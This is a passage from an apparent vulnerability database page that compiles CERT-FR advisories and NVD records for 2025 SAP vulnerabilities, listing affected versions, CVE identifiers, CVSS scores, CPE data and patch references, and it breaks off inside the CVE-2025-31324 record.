| SAP | SAPUI5 applications | SAPUI5 applications versions SAP_UI 750, 754, 755, 756, 757, 758 et UI_700 200 | ||
| SAP | S/4HANA | S/4HANA (Manage Central Purchase Contract application) versions S4CORE 106, 107 et 108 | ||
| SAP | S/4HANA | S/4HANA (Enterprise Event Enablement) versions SAP_GWFND 757 et 758 | ||
| SAP | GRC | GRC (AC Plugin) versions GRCPINW V1100_700 et V1100_731 | ||
| SAP | BusinessObjects Business Intelligence | BusinessObjects Business Intelligence (BI Workspace) versions ENTERPRISE 430, 2025 et 2027 | ||
| SAP | S/4HANA | S/4HANA (Bank Account Application) versions S4CORE 108 | ||
| SAP | NetWeaver Application Server pour ABAP | NetWeaver Application Server for ABAP versions KERNEL 7.89, 7.93, 9.14 et 9.15 | ||
| SAP | Business Warehouse et SAP Plug-In Basis | Business Warehouse et SAP Plug-In Basis versions PI_BASIS 2006_1_700, 701, 702, 731, 740, SAP_BW 750, 751, 752, 753, 754, 755, 756, 757, 758, 914 et 915 |
References
| Title | Publication Time | Tags | |||
|---|---|---|---|---|---|
|
|||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Business Objects Business Intelligence Platform versions ENTERPRISE 430, 2025 et 2027",
"product": {
"name": "Business Objects Business Intelligence Platform",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "NetWeaver (ABAP Keyword Documentation) versions SAP_BASIS 758",
"product": {
"name": "NetWeaver",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "NetWeaver Visual Composer versions VCBASE 7.50",
"product": {
"name": "NetWeaver Visual Composer",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "Business One Integration Framework versions B1_ON_HANA 10.0 et SAP-M-BO 10.0",
"product": {
"name": "Business One Integration Framework",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "MDM Server versions 710.750",
"product": {
"name": "MDM Server",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "S/4HANA (Manage Processing Rules - For Bank Statement) versions S4CORE 104, 105, 106, 107 et 108",
"product": {
"name": "S/4HANA",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "SAPUI5 applications versions SAP_UI 750, 754, 755, 756, 757, 758 et UI_700 200",
"product": {
"name": "SAPUI5 applications",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "S/4HANA (Manage Central Purchase Contract application) versions S4CORE 106, 107 et 108",
"product": {
"name": "S/4HANA",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "S/4HANA (Enterprise Event Enablement) versions SAP_GWFND 757 et 758",
"product": {
"name": "S/4HANA",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "GRC (AC Plugin) versions GRCPINW V1100_700 et V1100_731",
"product": {
"name": "GRC",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "BusinessObjects Business Intelligence (BI Workspace) versions ENTERPRISE 430, 2025 et 2027",
"product": {
"name": "BusinessObjects Business Intelligence",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "S/4HANA (Bank Account Application) versions S4CORE 108",
"product": {
"name": "S/4HANA",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "NetWeaver Application Server for ABAP versions KERNEL 7.89, 7.93, 9.14 et 9.15",
"product": {
"name": "NetWeaver Application Server pour ABAP",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "Business Warehouse et SAP Plug-In Basis versions PI_BASIS 2006_1_700, 701, 702, 731, 740, SAP_BW 750, 751, 752, 753, 754, 755, 756, 757, 758, 914 et 915",
"product": {
"name": "Business Warehouse et SAP Plug-In Basis",
"vendor": {
"name": "SAP",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2025-42987",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42987"
},
{
"name": "CVE-2025-42991",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42991"
},
{
"name": "CVE-2025-42996",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42996"
},
{
"name": "CVE-2025-42988",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42988"
},
{
"name": "CVE-2025-42995",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42995"
},
{
"name": "CVE-2025-42984",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42984"
},
{
"name": "CVE-2025-42982",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42982"
},
{
"name": "CVE-2025-42993",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42993"
},
{
"name": "CVE-2025-42977",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42977"
},
{
"name": "CVE-2025-31325",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-31325"
},
{
"name": "CVE-2025-42983",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42983"
},
{
"name": "CVE-2025-42998",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42998"
},
{
"name": "CVE-2025-42989",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42989"
},
{
"name": "CVE-2025-42994",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42994"
},
{
"name": "CVE-2025-23192",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23192"
},
{
"name": "CVE-2025-42990",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42990"
}
],
"links": [],
"reference": "CERTFR-2025-AVI-0487",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2025-06-11T00:00:00.000000"
}
],
"risks": [
{
"description": "Injection de code indirecte \u00e0 distance (XSS)"
},
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
},
{
"description": "Falsification de requ\u00eates c\u00f4t\u00e9 serveur (SSRF)"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits SAP. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es, une atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es et une falsification de requ\u00eates c\u00f4t\u00e9 serveur (SSRF).",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits SAP",
"vendor_advisories": [
{
"published_at": "2025-06-10",
"title": "Bulletin de s\u00e9curit\u00e9 SAP june-2025",
"url": "https://support.sap.com/en/my-support/knowledge-base/security-notes-news/june-2025.html"
}
]
}
CERTFR-2025-AVI-0396
Vulnerability from certfr_avis - Published: - Updated:
De multiples vulnérabilités ont été découvertes dans les produits SAP. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, une atteinte à la confidentialité des données et une injection de code indirecte à distance (XSS).
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Impacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| SAP | S/4HANA | S/4HANA HCM Portugal and SAP ERP HCM Portugal versions S4HCMCPT 100, 101, SAP_HRCPT 600, 604 et 608 | ||
| SAP | N/A | Service Parts Management (SPM) versions SAP_APPL 600, 602, 603, 604, 605, 606, 616, 617, 618, SAPSCORE 111, S4CORE 100, 101 et 102 | ||
| SAP | NetWeaver | NetWeaver (Visual Composer development server) version VCFRAMEWORK 7.50 | ||
| SAP | N/A | Supplier Relationship Management (Master Data Management Catalog) version SRM_MDM_CAT 7.52 | ||
| SAP | Business Objects Business Intelligence Platform | BusinessObjects Business Intelligence Platform versions ENTERPRISE 420, 430 et 2025 | ||
| SAP | N/A | Business Objects Business Intelligence Platform (PMW) versions ENTERPRISE 430, 2025 et 2027 | ||
| SAP | NetWeaver Application Server ABAP et ABAP Platform | NetWeaver Application Server ABAP et ABAP Platform versions SAP_BASIS 700, SAP_BASIS 701, SAP_BASIS 702, SAP_BASIS 731, SAP_BASIS 740, SAP_BASIS 750, SAP_BASIS 751, SAP_BASIS 752, SAP_BASIS 753, SAP_BASIS 754, SAP_BASIS 755, SAP_BASIS 756, SAP_BASIS 757 et SAP_BASIS 758 | ||
| SAP | N/A | Data Services Management Console version SBOP DS JOB SERVER 4.3 | ||
| SAP | N/A | Digital Manufacturing (Production Operator Dashboard) version CTNR-DME-PODFOUNDATION-MS 1.0 | ||
| SAP | N/A | Fiori for SAP ERP versions SAP_GWFND 740, 750, 751, 752, 753, 754, 755, 756, 757 et 758 | ||
| SAP | S/4HANA | S4/HANA (OData meta-data property) versions S4CORE 102, 103, 104, 105 et 106 | ||
| SAP | S/4HANA | S/4HANA (Private Cloud & On-Premise) versions S4CRM 204, 205, 206, S4CEXT 107, 108, BBPCRM 702, 712, 713, 714 | ||
| SAP | S/4HANA | S/4HANA Cloud Private Edition or on Premise (SCM Master Data Layer (MDL)) versions S4CORE 102, 103, 104, 105, 106, 107, 108, SCM_BASIS 700, 701, 702, 712, 713 et 714 | ||
| SAP | N/A | Gateway Client versions SAP_GWFND 752, 753, 754, 755, 756, 757 et 758 | ||
| SAP | N/A | Supplier Relationship Management (Live Auction Cockpit) version SRM_SERVER 7.14 | ||
| SAP | N/A | Service Parts Management (SPM) versions SAP_APPL 617, 618, SAPSCORE 116, S4CORE 100, 101, 102 et 103 | ||
| SAP | N/A | PDCE versions S4CORE 102, 103, S4COREOP 104, 105, 106, 107 et 108 | ||
| SAP | N/A | Landscape Transformation (PCL Basis) versions DMIS 2011_1_700, 2011_1_710, 2011_1_730, 2011_1_731, 2018_1_752, 2020, S4CORE 102, 103, 104, 105, 106, 107 et 108 | ||
| SAP | N/A | GUI for Windows version BC-FES-GUI 8.00 |
References
| Title | Publication Time | Tags | |||
|---|---|---|---|---|---|
|
|||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "S/4HANA HCM Portugal and SAP ERP HCM Portugal versions S4HCMCPT 100, 101, SAP_HRCPT 600, 604 et 608",
"product": {
"name": "S/4HANA",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "Service Parts Management (SPM) versions SAP_APPL 600, 602, 603, 604, 605, 606, 616, 617, 618, SAPSCORE 111, S4CORE 100, 101 et 102",
"product": {
"name": "N/A",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "NetWeaver (Visual Composer development server) version VCFRAMEWORK 7.50",
"product": {
"name": "NetWeaver",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "Supplier Relationship Management (Master Data Management Catalog) version SRM_MDM_CAT 7.52",
"product": {
"name": "N/A",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "BusinessObjects Business Intelligence Platform versions ENTERPRISE 420, 430 et 2025",
"product": {
"name": "Business Objects Business Intelligence Platform",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "Business Objects Business Intelligence Platform (PMW) versions ENTERPRISE 430, 2025 et 2027",
"product": {
"name": "N/A",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "NetWeaver Application Server ABAP et ABAP Platform versions SAP_BASIS 700, SAP_BASIS 701, SAP_BASIS 702, SAP_BASIS 731, SAP_BASIS 740, SAP_BASIS 750, SAP_BASIS 751, SAP_BASIS 752, SAP_BASIS 753, SAP_BASIS 754, SAP_BASIS 755, SAP_BASIS 756, SAP_BASIS 757 et SAP_BASIS 758",
"product": {
"name": "NetWeaver Application Server ABAP et ABAP Platform",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "Data Services Management Console version SBOP DS JOB SERVER 4.3",
"product": {
"name": "N/A",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "Digital Manufacturing (Production Operator Dashboard) version CTNR-DME-PODFOUNDATION-MS 1.0",
"product": {
"name": "N/A",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "Fiori for SAP ERP versions SAP_GWFND 740, 750, 751, 752, 753, 754, 755, 756, 757 et 758",
"product": {
"name": "N/A",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "S4/HANA (OData meta-data property) versions S4CORE 102, 103, 104, 105 et 106",
"product": {
"name": "S/4HANA",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "S/4HANA (Private Cloud \u0026 On-Premise) versions S4CRM 204, 205, 206, S4CEXT 107, 108, BBPCRM 702, 712, 713, 714",
"product": {
"name": "S/4HANA",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "S/4HANA Cloud Private Edition or on Premise (SCM Master Data Layer (MDL)) versions S4CORE 102, 103, 104, 105, 106, 107, 108, SCM_BASIS 700, 701, 702, 712, 713 et 714",
"product": {
"name": "S/4HANA",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "Gateway Client versions SAP_GWFND 752, 753, 754, 755, 756, 757 et 758",
"product": {
"name": "N/A",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "Supplier Relationship Management (Live Auction Cockpit) version SRM_SERVER 7.14",
"product": {
"name": "N/A",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "Service Parts Management (SPM) versions SAP_APPL 617, 618, SAPSCORE 116, S4CORE 100, 101, 102 et 103",
"product": {
"name": "N/A",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "PDCE versions S4CORE 102, 103, S4COREOP 104, 105, 106, 107 et 108",
"product": {
"name": "N/A",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "Landscape Transformation (PCL Basis) versions DMIS 2011_1_700, 2011_1_710, 2011_1_730, 2011_1_731, 2018_1_752, 2020, S4CORE 102, 103, 104, 105, 106, 107 et 108",
"product": {
"name": "N/A",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "GUI for Windows version BC-FES-GUI 8.00",
"product": {
"name": "N/A",
"vendor": {
"name": "SAP",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2025-43003",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-43003"
},
{
"name": "CVE-2025-43007",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-43007"
},
{
"name": "CVE-2025-23191",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23191"
},
{
"name": "CVE-2025-42999",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42999"
},
{
"name": "CVE-2025-43009",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-43009"
},
{
"name": "CVE-2025-43011",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-43011"
},
{
"name": "CVE-2025-43006",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-43006"
},
{
"name": "CVE-2025-0060",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-0060"
},
{
"name": "CVE-2025-30012",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30012"
},
{
"name": "CVE-2025-43000",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-43000"
},
{
"name": "CVE-2025-43004",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-43004"
},
{
"name": "CVE-2025-31324",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-31324"
},
{
"name": "CVE-2025-43005",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-43005"
},
{
"name": "CVE-2025-43008",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-43008"
},
{
"name": "CVE-2025-31329",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-31329"
},
{
"name": "CVE-2025-30009",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30009"
},
{
"name": "CVE-2025-30011",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30011"
},
{
"name": "CVE-2025-43002",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-43002"
},
{
"name": "CVE-2025-26662",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-26662"
},
{
"name": "CVE-2025-30010",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30010"
},
{
"name": "CVE-2025-42997",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-42997"
},
{
"name": "CVE-2025-0061",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-0061"
},
{
"name": "CVE-2025-43010",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-43010"
},
{
"name": "CVE-2024-39592",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-39592"
},
{
"name": "CVE-2025-30018",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30018"
}
],
"links": [],
"reference": "CERTFR-2025-AVI-0396",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2025-05-13T00:00:00.000000"
},
{
"description": "Ajout des identifiants CVE CVE-2025-0060, CVE-2025-0061 et CVE-2025-23191",
"revision_date": "2025-06-12T00:00:00.000000"
}
],
"risks": [
{
"description": "Injection de code indirecte \u00e0 distance (XSS)"
},
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits SAP. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es et une injection de code indirecte \u00e0 distance (XSS).",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits SAP",
"vendor_advisories": [
{
"published_at": "2025-05-13",
"title": "Bulletin de s\u00e9curit\u00e9 SAP may-2025",
"url": "https://support.sap.com/en/my-support/knowledge-base/security-notes-news/may-2025.html"
}
]
}
FKIE_CVE-2025-42968
Vulnerability from fkie_nvd - Published: 2025-07-08 01:15 - Updated: 2025-10-27 16:57
Severity ?
5.0 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
4.3 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
4.3 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
Summary
SAP NetWeaver allows an authenticated non-administrative user to call the remote-enabled function module which could grants access to non-sensitive information about the SAP system and OS without requiring any specific knowledge or controlled conditions. This leads to a low impact on confidentiality with no effect on integrity or availability of the application.
References
| URL | Tags | ||
|---|---|---|---|
| cna@sap.com | https://me.sap.com/notes/3621037 | Permissions Required | |
| cna@sap.com | https://url.sap/sapsecuritypatchday | Patch |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| sap | netweaver | 700 | |
| sap | netweaver | 701 | |
| sap | netweaver | 702 | |
| sap | netweaver | 710 | |
| sap | netweaver | 731 | |
| sap | netweaver | 740 | |
| sap | netweaver | 750 | |
| sap | netweaver | 751 | |
| sap | netweaver | 752 | |
| sap | netweaver | 753 | |
| sap | netweaver | 754 | |
| sap | netweaver | 755 | |
| sap | netweaver | 756 | |
| sap | netweaver | 757 | |
| sap | netweaver | 758 | |
| sap | netweaver | 816 | |
| sap | netweaver | 914 | |
| sap | netweaver | 916 |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:700:*:*:*:*:*:*:*",
"matchCriteriaId": "A7FED49E-6F9A-494A-9226-1059249960A0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:701:*:*:*:*:*:*:*",
"matchCriteriaId": "4836C36D-242F-4818-81B4-C170959D02F5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:702:*:*:*:*:*:*:*",
"matchCriteriaId": "6A503ABF-8655-40D7-96AD-2D7F19A673AE",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:710:*:*:*:*:*:*:*",
"matchCriteriaId": "BA008537-4D80-4126-A0D1-B209B9E56B46",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:731:*:*:*:*:*:*:*",
"matchCriteriaId": "8A9D5C5A-6963-438B-B0EA-2A621A34D8A9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:740:*:*:*:*:*:*:*",
"matchCriteriaId": "BFFA1591-0304-4FAE-A6A7-72D04D1F41A3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:750:*:*:*:*:*:*:*",
"matchCriteriaId": "7940A9AF-308E-4CE5-BA19-7A3DCF49F644",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:751:*:*:*:*:*:*:*",
"matchCriteriaId": "C09428E4-45BB-414D-9F3D-AA5C73D2DD5E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:752:*:*:*:*:*:*:*",
"matchCriteriaId": "5ED0BA7D-939D-4B05-81A3-9F991C8C04F9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:753:*:*:*:*:*:*:*",
"matchCriteriaId": "0C2BF545-A7DC-4BB6-B894-D04CF163DD88",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:754:*:*:*:*:*:*:*",
"matchCriteriaId": "A75B2F18-60BE-41B5-82CB-520F794F2004",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:755:*:*:*:*:*:*:*",
"matchCriteriaId": "E31620E5-30FC-4545-A430-AAA77A66B51A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:756:*:*:*:*:*:*:*",
"matchCriteriaId": "9724E131-9893-4630-96A2-EB6032D98C58",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:757:*:*:*:*:*:*:*",
"matchCriteriaId": "8FEBCDDF-4828-45D1-A81D-FFB50261DBCA",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:758:*:*:*:*:*:*:*",
"matchCriteriaId": "8FB60751-D53F-496C-AB5B-922561FB27D5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:816:*:*:*:*:*:*:*",
"matchCriteriaId": "4E4042A5-8859-44E6-9CA0-AA8A09D081A3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:914:*:*:*:*:*:*:*",
"matchCriteriaId": "0018F635-E38F-47AB-9AC3-CA2BBE6D5FA8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:916:*:*:*:*:*:*:*",
"matchCriteriaId": "52996086-B7EA-40CB-B6F3-983C11329FF2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "SAP NetWeaver allows an authenticated non-administrative user to call the remote-enabled function module which could grants access to non-sensitive information about the SAP system and OS without requiring any specific knowledge or controlled conditions. This leads to a low impact on confidentiality with no effect on integrity or availability of the application."
},
{
"lang": "es",
"value": "SAP NetWeaver permite que un usuario no administrativo autenticado acceda al m\u00f3dulo de funci\u00f3n remota, lo que le otorga acceso a informaci\u00f3n no confidencial sobre el sistema SAP y el sistema operativo sin necesidad de conocimientos espec\u00edficos ni condiciones controladas. Esto reduce el impacto en la confidencialidad y no afecta la integridad ni la disponibilidad de la aplicaci\u00f3n."
}
],
"id": "CVE-2025-42968",
"lastModified": "2025-10-27T16:57:45.097",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.1,
"impactScore": 1.4,
"source": "cna@sap.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 1.4,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2025-07-08T01:15:23.950",
"references": [
{
"source": "cna@sap.com",
"tags": [
"Permissions Required"
],
"url": "https://me.sap.com/notes/3621037"
},
{
"source": "cna@sap.com",
"tags": [
"Patch"
],
"url": "https://url.sap/sapsecuritypatchday"
}
],
"sourceIdentifier": "cna@sap.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-862"
}
],
"source": "cna@sap.com",
"type": "Primary"
}
]
}
FKIE_CVE-2025-42999
Vulnerability from fkie_nvd - Published: 2025-05-13 01:15 - Updated: 2025-10-31 21:58
Severity ?
Summary
SAP NetWeaver Visual Composer Metadata Uploader is vulnerable when a privileged user can upload untrusted or malicious content which, when deserialized, could potentially lead to a compromise of confidentiality, integrity, and availability of the host system.
References
| URL | Tags | ||
|---|---|---|---|
| cna@sap.com | https://me.sap.com/notes/3604119 | Permissions Required | |
| cna@sap.com | https://url.sap/sapsecuritypatchday | Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://onapsis.com/blog/active-exploitation-of-sap-vulnerability-cve-2025-31324/ | Exploit, Third Party Advisory | |
| 134c704f-9b21-4f2e-91b3-4a467353bcc0 | https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-42999 | US Government Resource |
{
"cisaActionDue": "2025-06-05",
"cisaExploitAdd": "2025-05-15",
"cisaRequiredAction": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.",
"cisaVulnerabilityName": "SAP NetWeaver Deserialization Vulnerability",
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:7.5:*:*:*:*:*:*:*",
"matchCriteriaId": "74F7C92A-48F7-456A-BDFF-91A482DE8546",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "SAP NetWeaver Visual Composer Metadata Uploader is vulnerable when a privileged user can upload untrusted or malicious content which, when deserialized, could potentially lead to a compromise of confidentiality, integrity, and availability of the host system."
},
{
"lang": "es",
"value": "SAP NetWeaver Visual Composer Metadata Uploader es vulnerable cuando un usuario privilegiado puede cargar contenido malicioso o no confiable que, al deserializarse, podr\u00eda comprometer la confidencialidad, integridad y disponibilidad del sistema host."
}
],
"id": "CVE-2025-42999",
"lastModified": "2025-10-31T21:58:56.343",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 6.0,
"source": "cna@sap.com",
"type": "Secondary"
}
]
},
"published": "2025-05-13T01:15:48.440",
"references": [
{
"source": "cna@sap.com",
"tags": [
"Permissions Required"
],
"url": "https://me.sap.com/notes/3604119"
},
{
"source": "cna@sap.com",
"tags": [
"Vendor Advisory"
],
"url": "https://url.sap/sapsecuritypatchday"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://onapsis.com/blog/active-exploitation-of-sap-vulnerability-cve-2025-31324/"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"tags": [
"US Government Resource"
],
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-42999"
}
],
"sourceIdentifier": "cna@sap.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-502"
}
],
"source": "cna@sap.com",
"type": "Secondary"
}
]
}
FKIE_CVE-2025-31324
Vulnerability from fkie_nvd - Published: 2025-04-24 17:15 - Updated: 2025-10-31 21:56
Severity ?
10.0 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Summary
SAP NetWeaver Visual Composer Metadata Uploader is not protected with a proper authorization, allowing unauthenticated agent to upload potentially malicious executable binaries that could severely harm the host system. This could significantly affect the confidentiality, integrity, and availability of the targeted system.
References
{
